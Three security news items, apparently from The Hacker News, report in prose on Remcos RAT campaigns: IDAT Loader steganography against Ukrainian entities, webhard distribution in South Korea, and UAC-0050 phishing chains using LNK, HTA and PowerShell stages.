Feb 26, 2024The Hacker NewsSteganography / Malware

Ukrainian entities based in Finland have been targeted as part of a malicious campaign distributing a commercial remote access trojan known as Remcos RAT using a malware loader called IDAT Loader.

The attack has been attributed to a threat actor tracked by the Computer Emergency Response Team of Ukraine (CERT-UA) under the moniker UAC-0184.

“The attack, as part of the IDAT Loader, used steganography as a technique,” Morphisec researcher Michael Dereviashkin said in a report shared with The Hacker News. “While steganographic, or ‘Stego’ techniques are well-known, it is important to understand their roles in defense evasion, to better understand how to defend against such tactics.”

IDAT Loader, which overlaps with another loader family called Hijack Loader, has been used to serve additional payloads like DanaBot, SystemBC, and RedLine Stealer in recent months. It has also been used by a threat actor tracked as TA544 to distribute Remcos RAT and SystemBC via phishing attacks.

The phishing campaign – first disclosed by CERT-UA in early January 2024 – entail using war-themed lures as a starting point to kick-start an infection chain that leads to the deployment of IDAT Loader, which, in turn, uses an embedded steganographic PNG to locate and extract Remcos RAT.

The development comes as CERT-UA revealed that defense forces in the country have been targeted via the Signal instant messaging app to distribute a booby-trapped Microsoft Excel document that executes COOKBOX, a PowerShell-based malware that’s capable of loading and executing cmdlets. CERT-UA has attributed the activity to a cluster dubbed UAC-0149.

It also follows the resurgence of malware campaigns propagating PikaBot malware since February 8, 2024, using an updated variant that appears to be currently under active development.

“This version of the PIKABOT loader uses a new unpacking method and heavy obfuscation,” Elastic Security Labs said. “The core module has added a new string decryption implementation, changes to obfuscation functionality, and various other modifications.”

Jan 16, 2024NewsroomBotnet / Malware

The remote access trojan (RAT) known as Remcos RAT has been found being propagated via webhards by disguising it as adult-themed games in South Korea.

WebHard, short for web hard drive, is a popular online file storage system used to upload, download, and share files in the country.

While webhards have been used in the past to deliver njRAT, UDP RAT, and DDoS botnet malware, the AhnLab Security Emergency Response Center’s (ASEC) latest analysis shows that the technique has been adopted to distribute Remcos RAT.

In these attacks, users are tricked into opening booby-trapped files by passing them off as adult games, which, when launched, execute malicious Visual Basic scripts in order to run an intermediate binary named “ffmpeg.exe.”

This results in the retrieval of Remcos RAT from an actor-controlled server.

A sophisticated RAT, Remcos (aka Remote Control and Surveillance) facilitates unauthorized remote control and surveillance of compromised hosts, enabling threat actors to exfiltrate sensitive data.

This malware, although originally marketed by Germany-based firm Breaking Security in 2016 as a bonafide remote administration tool, has metamorphosed into a potent weapon wielded by adversaries actors to infiltrate systems and establish unfettered control.

“Remcos RAT has evolved into a malicious tool employed by threat actors across various campaigns,” Cyfirma noted in an analysis in August 2023.

“The malware’s multifunctional capabilities, including keylogging, audio recording, screenshot capture, and more, highlight its potential to compromise user privacy, exfiltrate sensitive data, and manipulate systems. The RAT’s ability to disable User Account Control (UAC) and establish persistence further amplifies its potential impact.”

Jan 04, 2024NewsroomSoftware Security / Malware

The threat actor known as UAC-0050 is leveraging phishing attacks to distribute Remcos RAT using new strategies to evade detection from security software.

“The group’s weapon of choice is Remcos RAT, a notorious malware for remote surveillance and control, which has been at the forefront of its espionage arsenal,” Uptycs security researchers Karthick Kumar and Shilpesh Trivedi said in a Wednesday report.

“However, in their latest operational twist, the UAC-0050 group has integrated a pipe method for interprocess communication, showcasing their advanced adaptability.”

UAC-0050, active since 2020, has a history of targeting Ukrainian and Polish entities via social engineering campaigns that impersonate legitimate organizations to trick recipients into opening malicious attachments.

In February 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) attributed the adversary to a phishing campaign designed to deliver Remcos RAT.

Over the past few months, the same trojan has been distributed as part of at least three different phishing waves, with one such attack also leading to the deployment of an information stealer called Meduza Stealer.

The analysis from Uptycs is based on a LNK file it discovered on December 21, 2023. While the exact initial access vector is currently unknown, it’s suspected to have involved phishing emails targeting Ukrainian military personnel that claim to advertise consultancy roles with the Israel Defense Forces (IDF).

The LNK file in question collects information regarding antivirus products installed on the target computer, and then proceeds to retrieve and execute an HTML application named “6.hta” from a remote server using mshta.exe, a Windows-native binary for running HTA files.

This step paves the way for a PowerShell script that unpacks another PowerShell script to download two files called “word_update.exe” and “ofer.docx” from the domain new-tech-savvy[.]com.

Running word_update.exe causes it to create a copy of itself with the name fmTask_dbg.exe and establish persistence by creating a shortcut to the new executable in the Windows Startup folder.

The binary also employs unnamed pipes to facilitate the exchange of data between itself and a newly spawned child process for cmd.exe in order to ultimately decrypt and launch the Remcos RAT (version 4.9.2 Pro), which is capable of harvesting system data and cookies and login information from web browsers like Internet Explorer, Mozilla Firefox, and Google Chrome.

“Leveraging pipes within the Windows operating system provides a covert channel for data transfer, skillfully evading detection by Endpoint Detection and Response (EDR) and antivirus systems,” the researchers said.

“Although not entirely new, this technique marks a significant leap in the sophistication of the group’s strategies.”